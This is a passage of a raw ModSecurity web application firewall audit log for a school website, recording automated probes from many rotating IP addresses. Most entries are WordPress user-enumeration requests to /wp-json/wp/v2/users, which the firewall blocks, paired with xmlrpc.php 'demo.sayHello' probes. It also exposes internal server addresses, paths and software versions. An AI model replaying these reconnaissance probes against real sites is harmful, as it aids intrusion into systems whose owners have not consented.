"TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727284230611 5453 (- - -) Stopwatch2: 1746727284230611 5453; combined=4087, p1=532, p2=3330, p3=33, p4=33, p5=94, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb81c60-Z-- --6d04f52d-A-- [09/May/2025:01:02:04 +0700] aBzxnKcs1DvJ_HgMHE95egAAAAw 103.236.140.4 53490 103.236.140.4 8181 --6d04f52d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6d04f52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d04f52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727324291494 3025 (- - -) Stopwatch2: 1746727324291494 3025; combined=1359, p1=455, p2=874, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d04f52d-Z-- --a6f7f370-A-- [09/May/2025:01:02:06 +0700] aBzxnqcs1DvJ_HgMHE95fAAAAAQ 103.236.140.4 53494 103.236.140.4 8181 --a6f7f370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6f7f370-C-- demo.sayHello --a6f7f370-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6f7f370-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727326128708 5357 (- - -) Stopwatch2: 1746727326128708 5357; combined=4078, p1=529, p2=3316, p3=40, p4=32, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6f7f370-Z-- --9c720c55-A-- [09/May/2025:01:19:41 +0700] aBz1vcP9GxxPAbCroFZCJAAAAEM 103.236.140.4 53586 103.236.140.4 8181 --9c720c55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c720c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c720c55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746728381150700 2877 (- - -) Stopwatch2: 1746728381150700 2877; combined=1334, p1=432, p2=867, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c720c55-Z-- --cfbb0e5f-A-- [09/May/2025:01:19:44 +0700] aBz1wMP9GxxPAbCroFZCJgAAAFc 103.236.140.4 53590 103.236.140.4 8181 --cfbb0e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfbb0e5f-C-- demo.sayHello --cfbb0e5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbb0e5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746728384769246 5756 (- - -) Stopwatch2: 1746728384769246 5756; combined=4243, p1=523, p2=3435, p3=28, p4=30, p5=127, sr=73, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbb0e5f-Z-- --ff634637-A-- [09/May/2025:01:22:35 +0700] aBz2a44K347NtBcwXKx0ywAAAIo 103.236.140.4 53614 103.236.140.4 8181 --ff634637-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.242.231.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff634637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff634637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746728555692235 3323 (- - -) Stopwatch2: 1746728555692235 3323; combined=1412, p1=471, p2=908, p3=0, p4=0, p5=32, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff634637-Z-- --d118a272-A-- [09/May/2025:01:32:39 +0700] aBz4x8P9GxxPAbCroFZCLgAAAEo 103.236.140.4 53672 103.236.140.4 8181 --d118a272-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 167.172.219.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 167.172.219.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d118a272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d118a272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746729159535350 2906 (- - -) Stopwatch2: 1746729159535350 2906; combined=1283, p1=403, p2=845, p3=0, p4=0, p5=34, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d118a272-Z-- --350b2323-A-- [09/May/2025:01:46:25 +0700] aBz8AcP9GxxPAbCroFZCQAAAAEw 103.236.140.4 53744 103.236.140.4 8181 --350b2323-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.98.147.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.98.147.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --350b2323-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --350b2323-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746729985812670 3175 (- - -) Stopwatch2: 1746729985812670 3175; combined=1373, p1=486, p2=854, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --350b2323-Z-- --05c73102-A-- [09/May/2025:01:51:34 +0700] aBz9NsP9GxxPAbCroFZCQgAAAEI 103.236.140.4 53770 103.236.140.4 8181 --05c73102-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --05c73102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c73102-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730294986660 3152 (- - -) Stopwatch2: 1746730294986660 3152; combined=1365, p1=486, p2=847, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c73102-Z-- --0fff827a-A-- [09/May/2025:01:51:38 +0700] aBz9Oqcs1DvJ_HgMHE95oQAAABc 103.236.140.4 53774 103.236.140.4 8181 --0fff827a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fff827a-C-- demo.sayHello --0fff827a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fff827a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730298731727 5465 (- - -) Stopwatch2: 1746730298731727 5465; combined=4181, p1=538, p2=3417, p3=41, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fff827a-Z-- --3bcd6754-A-- [09/May/2025:01:52:12 +0700] aBz9XKcs1DvJ_HgMHE95owAAAAI 103.236.140.4 53780 103.236.140.4 8181 --3bcd6754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3bcd6754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bcd6754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730332032520 3053 (- - -) Stopwatch2: 1746730332032520 3053; combined=1348, p1=431, p2=882, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bcd6754-Z-- --dc516e42-A-- [09/May/2025:01:52:14 +0700] aBz9Xqcs1DvJ_HgMHE95pQAAABI 103.236.140.4 53784 103.236.140.4 8181 --dc516e42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc516e42-C-- demo.sayHello --dc516e42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc516e42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730334954343 4819 (- - -) Stopwatch2: 1746730334954343 4819; combined=3790, p1=435, p2=3139, p3=32, p4=32, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc516e42-Z-- --e9769b5b-A-- [09/May/2025:01:52:55 +0700] aBz9h6cs1DvJ_HgMHE95qQAAABg 103.236.140.4 53794 103.236.140.4 8181 --e9769b5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9769b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9769b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730375440555 3173 (- - -) Stopwatch2: 1746730375440555 3173; combined=1349, p1=464, p2=853, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9769b5b-Z-- --0b65940e-A-- [09/May/2025:01:52:58 +0700] aBz9iqcs1DvJ_HgMHE95qwAAAAs 103.236.140.4 53798 103.236.140.4 8181 --0b65940e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b65940e-C-- demo.sayHello --0b65940e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b65940e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730378399532 5273 (- - -) Stopwatch2: 1746730378399532 5273; combined=3940, p1=504, p2=3222, p3=29, p4=32, p5=90, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b65940e-Z-- --b6fa7311-A-- [09/May/2025:01:53:26 +0700] aBz9pqcs1DvJ_HgMHE95rQAAAA8 103.236.140.4 53804 103.236.140.4 8181 --b6fa7311-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6fa7311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6fa7311-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730406807849 2935 (- - -) Stopwatch2: 1746730406807849 2935; combined=1326, p1=464, p2=830, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6fa7311-Z-- --c096fa58-A-- [09/May/2025:01:53:30 +0700] aBz9qqcs1DvJ_HgMHE95rwAAABA 103.236.140.4 53808 103.236.140.4 8181 --c096fa58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c096fa58-C-- demo.sayHello --c096fa58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c096fa58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730410057821 4547 (- - -) Stopwatch2: 1746730410057821 4547; combined=3609, p1=462, p2=2946, p3=25, p4=22, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c096fa58-Z-- --519f0976-A-- [09/May/2025:01:53:42 +0700] aBz9tqcs1DvJ_HgMHE95tAAAAAA 103.236.140.4 53822 103.236.140.4 8181 --519f0976-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --519f0976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --519f0976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730422991140 2636 (- - -) Stopwatch2: 1746730422991140 2636; combined=1410, p1=455, p2=917, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --519f0976-Z-- --965fa210-A-- [09/May/2025:01:53:46 +0700] aBz9uqcs1DvJ_HgMHE95tgAAAAc 103.236.140.4 53826 103.236.140.4 8181 --965fa210-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --965fa210-C-- demo.sayHello --965fa210-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --965fa210-H-- Message: Warning. Match of 